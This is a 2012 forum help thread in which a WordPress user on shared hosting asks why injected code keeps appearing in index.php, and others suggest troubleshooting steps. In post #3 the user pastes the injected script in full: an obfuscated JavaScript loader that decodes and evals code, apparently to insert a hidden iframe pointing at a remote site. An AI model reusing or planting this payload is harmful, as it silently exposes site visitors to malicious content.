8 Replies - 12496 Views - Last Post: 14 March 2012 - 07:45 AM

#1 dreamincodehamza  Icon User is offline

  • D.I.C Regular
  • member icon

Reputation: -12
  • View blog
  • Posts: 332
  • Joined: 12-September 08

wordpress security

Posted 21 February 2012 - 03:26 PM

i am installing and wordpress blog on my godaddy hosting account and it is getting hacking code.
its a fresh installation and i tried again installing it but it is getting hacking code on top index.php
please help .
Is This A Good Question/Topic? 0
  • +

Replies To: wordpress security

#2 modi123_1  Icon User is online

  • Suitor #2
  • member icon



Reputation: 9568
  • View blog
  • Posts: 36,222
  • Joined: 12-June 08

Re: wordpress security

Posted 21 February 2012 - 03:30 PM

What do you mean "hacking code"?
Was This Post Helpful? 0
  • +
  • -

#3 dreamincodehamza  Icon User is offline

  • D.I.C Regular
  • member icon

Reputation: -12
  • View blog
  • Posts: 332
  • Joined: 12-September 08

Re: wordpress security

Posted 21 February 2012 - 03:35 PM

View Postmodi123_1, on 21 February 2012 - 03:30 PM, said:

What do you mean "hacking code"?



This is what i am getting.
<script>if(window.document)aa=/s/g.exec("s").index+[];aaa='0';if(aa.indexOf(aaa)===0){ss='';try{new document();}catch(qqq){s=String;f='f'+'r'+'o'+'mChar';}ee='e';e=window.eval;t='y';}h=2*Math.sin(3*Math.PI/2);n=[3.5,3.5,51.5,50,15,19,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,19.5,60.5,3.5,3.5,3.5,51.5,50,56,47.5,53.5,49.5,56,19,19.5,28.5,3.5,3.5,61.5,15,49.5,53,56.5,49.5,15,60.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,58.5,56,51.5,57,49.5,19,16,29,51.5,50,56,47.5,53.5,49.5,15,56.5,56,48.5,29.5,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,27,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,15,58.5,51.5,49,57,51,29.5,18.5,23.5,23,18.5,15,51,49.5,51.5,50.5,51,57,29.5,18.5,23.5,23,18.5,15,56.5,57,59.5,53,49.5,29.5,18.5,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,28,51,51.5,49,49,49.5,54,28.5,55,54.5,56.5,51.5,57,51.5,54.5,54,28,47.5,48,56.5,54.5,53,57.5,57,49.5,28.5,53,49.5,50,57,28,23,28.5,57,54.5,55,28,23,28.5,18.5,30,29,22.5,51.5,50,56,47.5,53.5,49.5,30,16,19.5,28.5,3.5,3.5,61.5,3.5,3.5,50,57.5,54,48.5,57,51.5,54.5,54,15,51.5,50,56,47.5,53.5,49.5,56,19,19.5,60.5,3.5,3.5,3.5,58,47.5,56,15,50,15,29.5,15,49,54.5,48.5,57.5,53.5,49.5,54,57,22,48.5,56,49.5,47.5,57,49.5,33.5,53,49.5,53.5,49.5,54,57,19,18.5,51.5,50,56,47.5,53.5,49.5,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,56.5,56,48.5,18.5,21,18.5,51,57,57,55,28,22.5,22.5,57,49,56.5,27,26,22,25,53.5,59.5,49,54.5,53.5,47.5,51.5,54,22,48.5,54.5,53.5,22.5,56.5,57,49,56.5,22.5,50.5,54.5,22,55,51,55,30.5,56.5,51.5,49,29.5,23.5,18.5,19.5,28.5,50,22,56.5,57,59.5,53,49.5,22,58,51.5,56.5,51.5,48,51.5,53,51.5,57,59.5,29.5,18.5,51,51.5,49,49,49.5,54,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,55,54.5,56.5,51.5,57,51.5,54.5,54,29.5,18.5,47.5,48,56.5,54.5,53,57.5,57,49.5,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,53,49.5,50,57,29.5,18.5,23,18.5,28.5,50,22,56.5,57,59.5,53,49.5,22,57,54.5,55,29.5,18.5,23,18.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,58.5,51.5,49,57,51,18.5,21,18.5,23.5,23,18.5,19.5,28.5,50,22,56.5,49.5,57,31.5,57,57,56,51.5,48,57.5,57,49.5,19,18.5,51,49.5,51.5,50.5,51,57,18.5,21,18.5,23.5,23,18.5,19.5,28.5,3.5,3.5,3.5,49,54.5,48.5,57.5,53.5,49.5,54,57,22,50.5,49.5,57,33.5,53,49.5,53.5,49.5,54,57,56.5,32,59.5,41,47.5,50.5,38,47.5,53.5,49.5,19,18.5,48,54.5,49,59.5,18.5,19.5,44.5,23,45.5,22,47.5,55,55,49.5,54,49,32.5,51,51.5,53,49,19,50,19.5,28.5,3.5,3.5,61.5];for(i=0;i-n.length<0;i++){j=i;ss=ss+s[f+'C'+'ode'](-h*(1+n[j]));}q=ss;e(q);</script>


Was This Post Helpful? 0
  • +
  • -

#4 revolutionx  Icon User is offline

  • D.I.C Head

Reputation: 60
  • View blog
  • Posts: 229
  • Joined: 23-July 09

Re: wordpress security

Posted 22 February 2012 - 06:35 AM

Which version of Wordpress are you using?

Have you scanned your PC to check that it hasn't been compromised? Have you changed your FTP login.

Which (if any) plugins are you using?

This post has been edited by revolutionx: 22 February 2012 - 06:36 AM

Was This Post Helpful? 0
  • +
  • -

#5 dreamincodehamza  Icon User is offline

  • D.I.C Regular
  • member icon

Reputation: -12
  • View blog
  • Posts: 332
  • Joined: 12-September 08

Re: wordpress security

Posted 22 February 2012 - 01:02 PM

View Postrevolutionx, on 22 February 2012 - 06:35 AM, said:

Which version of Wordpress are you using?

Have you scanned your PC to check that it hasn't been compromised? Have you changed your FTP login.

Which (if any) plugins are you using?


wordpress version 3.2.1 and now i upgrade as well but still getting the same code.
Yeah scanned my pc using nortan antivirous
Was This Post Helpful? 0
  • +
  • -

#6 floppyspace  Icon User is offline

  • D.I.C Regular

Reputation: 48
  • View blog
  • Posts: 254
  • Joined: 04-February 10

Re: wordpress security

Posted 22 February 2012 - 08:02 PM

This seems to be a new issue (or old one) arising.

See if any of these suggestions help

wordpress malware attack

good luck

If one of the js buffs come across this can you tell us what the script is actually doing, and a possible code to cancel its actions?

This post has been edited by floppyspace: 22 February 2012 - 08:07 PM

Was This Post Helpful? 0
  • +
  • -

#7 no2pencil  Icon User is offline

  • Admiral Fancy Pants
  • member icon

Reputation: 5388
  • View blog
  • Posts: 27,383
  • Joined: 10-May 07

Re: wordpress security

Posted 22 February 2012 - 08:07 PM

Being that GoDaddy is a large company web host, & this is a fresh install, I would recommend calling their customer support. Most likely they can clear your database & just start fresh.
Was This Post Helpful? 0
  • +
  • -

#8 floppyspace  Icon User is offline

  • D.I.C Regular

Reputation: 48
  • View blog
  • Posts: 254
  • Joined: 04-February 10

Re: wordpress security

Posted 22 February 2012 - 08:21 PM

View Postno2pencil, on 22 February 2012 - 08:07 PM, said:

Being that GoDaddy is a large company web host, & this is a fresh install, I would recommend calling their customer support. Most likely they can clear your database & just start fresh.


It would take them a while but yes this is a good option, I recently had dealings with them and to post the e-mails would delight me but it would probably come back and bite me in the a**.

I just checked 2 Godaddy sites I help maintain and they are not compromised.

Godaddy gives you an empty box to play with (so to speak) you can do anything with the space they provide, Just go into the manager kill the database and reinstall WordPress (it is quicker than seeking assistance from the support staff).

I find it easier using filezilla to upload but each to there own (at least I know it is the copy of WordPress I obtained :)).
Was This Post Helpful? 0
  • +
  • -

#9 Reprobus  Icon User is offline

  • D.I.C Head

Reputation: 0
  • View blog
  • Posts: 75
  • Joined: 24-November 10

Re: wordpress security

Posted 14 March 2012 - 07:45 AM

View Postfloppyspace, on 22 February 2012 - 10:21 PM, said:

View Postno2pencil, on 22 February 2012 - 08:07 PM, said:

Being that GoDaddy is a large company web host, & this is a fresh install, I would recommend calling their customer support. Most likely they can clear your database & just start fresh.


It would take them a while but yes this is a good option, I recently had dealings with them and to post the e-mails would delight me but it would probably come back and bite me in the a**.

I just checked 2 Godaddy sites I help maintain and they are not compromised.

Godaddy gives you an empty box to play with (so to speak) you can do anything with the space they provide, Just go into the manager kill the database and reinstall WordPress (it is quicker than seeking assistance from the support staff).

I find it easier using filezilla to upload but each to there own (at least I know it is the copy of WordPress I obtained :)).


I recently began having SPAM messages, asking me to approve of them passing though my SPAM blockers in WordPress 3.3 and make there way to my inbox. I can't figure out, how this is happening ?
Was This Post Helpful? 0
  • +
  • -

Page 1 of 1